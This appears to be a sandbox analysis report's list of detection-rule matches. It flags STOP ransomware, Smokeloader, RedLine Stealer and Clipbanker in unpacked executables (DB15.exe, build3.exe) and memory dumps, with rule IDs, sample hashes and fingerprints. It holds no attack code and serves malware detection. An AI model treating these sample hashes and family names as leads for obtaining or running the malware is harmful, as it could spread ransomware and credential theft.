Source: 28.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 19.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 19.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 28.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 28.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 27.2.DB15.exe.28415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 27.2.DB15.exe.28415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 27.2.DB15.exe.28415a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 27.2.DB15.exe.28415a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 19.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 19.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.DB15.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.2.DB15.exe.28915a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.2.DB15.exe.28915a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 22.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 22.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 21.2.DB15.exe.28a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 21.2.DB15.exe.28a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 43.2.build3.exe.24115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 43.2.build3.exe.24115a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 21.2.DB15.exe.28a15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 21.2.DB15.exe.28a15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000002.2358331788.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000000.00000002.2120177869.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.2358389618.0000000000CAD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000002.2358489940.0000000002741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000002B.00000002.3313329838.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000002B.00000002.3313329838.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000002C.00000002.4539281116.00000000030F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000002C.00000002.4532684195.0000000002CF4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000B.00000002.2820341095.00000000027D0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000002B.00000002.3313063118.000000000083D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000015.00000002.2970592193.0000000002708000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000023.00000002.3157028193.0000000000850000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001B.00000002.3053445351.000000000279C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000002.2358317151.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2120426554.0000000000D1F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2120318342.0000000000CC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000012.00000002.2843572828.00000000027F1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
